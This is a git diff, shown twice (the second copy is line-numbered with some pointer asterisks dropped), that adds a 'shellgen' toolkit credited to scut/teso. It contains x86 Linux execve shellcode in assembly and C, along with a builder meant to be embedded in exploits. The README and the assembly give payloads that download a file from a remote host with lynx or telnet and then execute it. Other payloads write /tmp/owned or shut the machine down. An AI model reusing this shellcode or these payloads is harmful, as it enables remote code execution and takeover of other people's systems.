5 files changed, 265 insertions, 0 deletions
diff --git a/other/shellgen/README b/other/shellgen/README
new file mode 100644
index 0000000..b6fbeaa
--- /dev/null
+++ b/other/shellgen/README
@@ -0,0 +1,38 @@
+gcc -o shellxp shellxp.c
+./shellxp commands ...
+or to exec the generated shellcode
+./shellxp exec commands ...
+either rip the sc_build routine into your exploits to directly create the
+shellcode on the fly, or prepare it.
+some examples:
+./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a"
+./shellxp /bin/sh -c "echo haha > /tmp/owned"
+./shellxp /sbin/shutdown -h now
+or especially fancy ;-)
+./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh"
+   (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file)
+   modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-)
+(imagine some other fancy stuff in here :-)
+...
+-scut/teso.
+to modify the shellcode, use:
+gcc -o shellcode shellcode.c sc.s
+./shellcode      <-- will dump the code
+./shellcode foo  <-- will dump and run the code
diff --git a/other/shellgen/sc.s b/other/shellgen/sc.s
new file mode 100644
index 0000000..6133b3e
--- /dev/null
+++ b/other/shellgen/sc.s
@@ -0,0 +1,51 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+.data
+.globl  cbegin
+.globl  cend
+cbegin:
+        jmp     jahead
+docall:
+        pop     %edi
+        movl    %edi, %esp
+        not     %sp                     /* build new stack frame */
+        xorl    %eax, %eax              /* read number of arguments */
+        movb    (%edi), %al
+        inc     %edi
+decl1:  push    %edi
+decl2:  scasb                           /* search delim bytes */
+        jnz     decl2
+        movb    %ah, -1(%edi)
+        dec     %eax
+        jnz     decl1
+        pop     %ebx                    /* pathname */
+        push    %ebx
+        push    %eax
+        pop     %edx                    /* esp -= 4, edx = &envp[] = NULL */
+        movl    %esp, %ecx              /* ecx = &argv[] */
+        movb    $11, %al
+        int     $0x80
+jahead: call    docall
+/* reverse order arguments */
+.byte   0x03    /* number of arguments */
+.ascii  "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte   0x03
+.ascii  "-c"
+.byte   0x02
+.ascii  "/bin/sh"
+.byte   0x01
+cend:
diff --git a/other/shellgen/shellcode.c b/other/shellgen/shellcode.c
new file mode 100644
index 0000000..1fc68cf
--- /dev/null
+++ b/other/shellgen/shellcode.c
@@ -0,0 +1,46 @@
+/* shellcode extraction utility,
+ * by type / teso, small mods by scut.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+extern void     cbegin ();
+extern void     cend ();
+int
+main (int argc, char *argv[])
+{
+        int             i;
+        unsigned char * buf = (unsigned char *) cbegin;
+        unsigned char   ex_buf[1024];
+        printf ("/* %d byte shellcode */\n", cend - cbegin);
+        printf ("\"");
+        for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+                printf ("\\x%02x", *buf & 0xff);
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"\n\"");
+                }
+        }
+        printf ("\";\n");
+        printf("\n");
+        if (argc > 1) {
+                printf ("%02x\n", ((unsigned char *) cbegin)[0]);
+                printf ("%02x\n", ex_buf[0]);
+                memcpy (ex_buf, cbegin, cend - cbegin);
+                printf ("%02x\n", ex_buf[0]);
+                ((void (*)()) &ex_buf)();
+        }
+        exit (EXIT_SUCCESS);
+}
diff --git a/other/shellgen/shellxp b/other/shellgen/shellxp
new file mode 100755
index 0000000..c52acb2
--- /dev/null
+++ b/other/shellgen/shellxp
Binary files differ
diff --git a/other/shellgen/shellxp.c b/other/shellgen/shellxp.c
new file mode 100644
index 0000000..4d5916b
--- /dev/null
+++ b/other/shellgen/shellxp.c
@@ -0,0 +1,130 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <ctype.h>
+#include <string.h>
+/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
+ */
+unsigned char   shellcode[] =
+        "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
+        "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
+        "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
+        "\xff\xff";
+static int      sc_build (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+void    hexdump (unsigned char *cbegin, unsigned char *cend);
+static int
+sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode,
+        char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
+void
+hexdump (unsigned char *cbegin, unsigned char *cend)
+{
+        int             i;
+        unsigned char * buf = cbegin;
+        printf ("/* %d byte shellcode */\n", cend - cbegin);
+        printf ("\"");
+        for (i = 0 ; buf < cend; ++buf) {
+                printf ("\\x%02x", *buf & 0xff);
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"\n\"");
+                }
+        }
+        printf ("\";\n\n");
+}
+int
+main (int argc, char *argv[])
+{
+        int             n;
+        unsigned char   tbuf[2048];
+        void            (* tbuf_f)(void) = (void *) tbuf;
+        printf ("build exploit shellcode\n");
+        printf ("-scut / teso.\n\n");
+        if (argc < 2) {
+                printf ("usage: %s [exec] commands ...\n\n",
+                        argv[0]);
+                exit (EXIT_FAILURE);
+        }
+        printf ("constructing shellcode...\n\n");
+        memset (tbuf, '\x00', sizeof (tbuf));
+        if (strcmp (argv[1], "exec") == 0)
+                n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
+        else
+                n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
+        if (n == -1) {
+                printf ("failed to build it.\n");
+                exit (EXIT_FAILURE);
+        }
+        printf ("shellcode size: %d bytes\n\n", n);
+        hexdump (tbuf, tbuf + n);
+        if (strcmp (argv[1], "exec") == 0)
+                tbuf_f ();
+        exit (EXIT_SUCCESS);
+}

diff --git a/other/shellgen/README b/other/shellgen/README new file mode 100644 index 0000000..b6fbeaa --- /dev/null +++ b/other/shellgen/README
@@ -0,0 +1,38 @@
	1
	2	gcc -o shellxp shellxp.c
	3
	4	./shellxp commands ...
	5
	6	or to exec the generated shellcode
	7
	8	./shellxp exec commands ...
	9
	10
	11	either rip the sc_build routine into your exploits to directly create the
	12	shellcode on the fly, or prepare it.
	13
	14	some examples:
	15
	16	./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a"
	17	./shellxp /bin/sh -c "echo haha > /tmp/owned"
	18	./shellxp /sbin/shutdown -h now
	19
	20	or especially fancy ;-)
	21
	22	./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)\|telnet www.foo.org 80)\|uudecode;/tmp/run.sh"
	23
	24	(where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file)
	25	modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-)
	26
	27	(imagine some other fancy stuff in here :-)
	28	...
	29
	30	-scut/teso.
	31
	32
	33	to modify the shellcode, use:
	34
	35	gcc -o shellcode shellcode.c sc.s
	36	./shellcode <-- will dump the code
	37	./shellcode foo <-- will dump and run the code
	38


diff --git a/other/shellgen/sc.s b/other/shellgen/sc.s new file mode 100644 index 0000000..6133b3e --- /dev/null +++ b/other/shellgen/sc.s
@@ -0,0 +1,51 @@
	1	/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
	2
	3	.data
	4	.globl cbegin
	5	.globl cend
	6
	7	cbegin:
	8
	9	jmp jahead
	10
	11	docall:
	12	pop %edi
	13
	14	movl %edi, %esp
	15	not %sp /* build new stack frame */
	16
	17	xorl %eax, %eax /* read number of arguments */
	18	movb (%edi), %al
	19	inc %edi
	20
	21	decl1: push %edi
	22	decl2: scasb /* search delim bytes */
	23	jnz decl2
	24
	25	movb %ah, -1(%edi)
	26	dec %eax
	27	jnz decl1
	28
	29	pop %ebx /* pathname */
	30	push %ebx
	31
	32	push %eax
	33	pop %edx /* esp -= 4, edx = &envp[] = NULL */
	34	movl %esp, %ecx /* ecx = &argv[] */
	35
	36	movb $11, %al
	37	int $0x80
	38
	39	jahead: call docall
	40
	41	/* reverse order arguments */
	42	.byte 0x03 /* number of arguments */
	43	.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
	44	.byte 0x03
	45	.ascii "-c"
	46	.byte 0x02
	47	.ascii "/bin/sh"
	48	.byte 0x01
	49
	50	cend:
	51


diff --git a/other/shellgen/shellcode.c b/other/shellgen/shellcode.c new file mode 100644 index 0000000..1fc68cf --- /dev/null +++ b/other/shellgen/shellcode.c
@@ -0,0 +1,46 @@
	1	/* shellcode extraction utility,
	2	* by type / teso, small mods by scut.
	3	*/
	4
	5
	6	#include <stdio.h>
	7	#include <stdlib.h>
	8
	9	extern void cbegin ();
	10	extern void cend ();
	11
	12
	13	int
	14	main (int argc, char *argv[])
	15	{
	16	int i;
	17	unsigned char * buf = (unsigned char *) cbegin;
	18	unsigned char ex_buf[1024];
	19
	20
	21	printf ("/* %d byte shellcode */\n", cend - cbegin);
	22	printf ("\"");
	23	for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
	24
	25	printf ("\\x%02x", *buf & 0xff);
	26
	27	if (++i >= 12) {
	28	i = 0;
	29	printf ("\"\n\"");
	30	}
	31	}
	32	printf ("\";\n");
	33
	34	printf("\n");
	35
	36	if (argc > 1) {
	37	printf ("%02x\n", ((unsigned char *) cbegin)[0]);
	38	printf ("%02x\n", ex_buf[0]);
	39	memcpy (ex_buf, cbegin, cend - cbegin);
	40	printf ("%02x\n", ex_buf[0]);
	41	((void (*)()) &ex_buf)();
	42	}
	43
	44	exit (EXIT_SUCCESS);
	45	}
	46


diff --git a/other/shellgen/shellxp b/other/shellgen/shellxp new file mode 100755 index 0000000..c52acb2 --- /dev/null +++ b/other/shellgen/shellxp
Binary files differ


diff --git a/other/shellgen/shellxp.c b/other/shellgen/shellxp.c new file mode 100644 index 0000000..4d5916b --- /dev/null +++ b/other/shellgen/shellxp.c
@@ -0,0 +1,130 @@
	1
	2	#include <stdio.h>
	3	#include <stdlib.h>
	4	#include <unistd.h>
	5	#include <ctype.h>
	6	#include <string.h>
	7
	8
	9	/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
	10	*/
	11	unsigned char shellcode[] =
	12	"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
	13	"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
	14	"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
	15	"\xff\xff";
	16
	17	static int sc_build (unsigned char *target, size_t target_len,
	18	unsigned char shellcode, char *argv);
	19
	20	void hexdump (unsigned char cbegin, unsigned char cend);
	21
	22
	23	static int
	24	sc_build (unsigned char target, size_t target_len, unsigned char shellcode,
	25	char **argv)
	26	{
	27	int i;
	28	size_t tl_orig = target_len;
	29
	30
	31	if (strlen (shellcode) >= (target_len - 1))
	32	return (-1);
	33
	34	memcpy (target, shellcode, strlen (shellcode));
	35	target += strlen (shellcode);
	36	target_len -= strlen (shellcode);
	37
	38	for (i = 0 ; argv[i] != NULL ; ++i)
	39	;
	40
	41	/* set argument count
	42	*/
	43	target[0] = (unsigned char) i;
	44	target++;
	45	target_len--;
	46
	47	for ( ; i > 0 ; ) {
	48	i -= 1;
	49
	50	if (strlen (argv[i]) >= target_len)
	51	return (-1);
	52
	53	printf ("[%3d/%3d] adding (%2d): %s\n",
	54	(tl_orig - target_len), tl_orig,
	55	strlen (argv[i]), argv[i]);
	56
	57	memcpy (target, argv[i], strlen (argv[i]));
	58	target += strlen (argv[i]);
	59	target_len -= strlen (argv[i]);
	60
	61	target[0] = (unsigned char) (i + 1);
	62	target++;
	63	target_len -= 1;
	64	}
	65
	66	return (tl_orig - target_len);
	67	}
	68
	69
	70	void
	71	hexdump (unsigned char cbegin, unsigned char cend)
	72	{
	73	int i;
	74	unsigned char * buf = cbegin;
	75
	76
	77	printf ("/* %d byte shellcode */\n", cend - cbegin);
	78	printf ("\"");
	79
	80	for (i = 0 ; buf < cend; ++buf) {
	81
	82	printf ("\\x%02x", *buf & 0xff);
	83
	84	if (++i >= 12) {
	85	i = 0;
	86	printf ("\"\n\"");
	87	}
	88	}
	89	printf ("\";\n\n");
	90	}
	91
	92
	93	int
	94	main (int argc, char *argv[])
	95	{
	96	int n;
	97	unsigned char tbuf[2048];
	98	void (* tbuf_f)(void) = (void *) tbuf;
	99
	100
	101	printf ("build exploit shellcode\n");
	102	printf ("-scut / teso.\n\n");
	103
	104	if (argc < 2) {
	105	printf ("usage: %s [exec] commands ...\n\n",
	106	argv[0]);
	107
	108	exit (EXIT_FAILURE);
	109	}
	110
	111	printf ("constructing shellcode...\n\n");
	112	memset (tbuf, '\x00', sizeof (tbuf));
	113	if (strcmp (argv[1], "exec") == 0)
	114	n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
	115	else
	116	n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
	117	if (n == -1) {
	118	printf ("failed to build it.\n");
	119	exit (EXIT_FAILURE);
	120	}
	121
	122	printf ("shellcode size: %d bytes\n\n", n);
	123	hexdump (tbuf, tbuf + n);
	124
	125	if (strcmp (argv[1], "exec") == 0)
	126	tbuf_f ();
	127
	128	exit (EXIT_SUCCESS);
	129	}
	130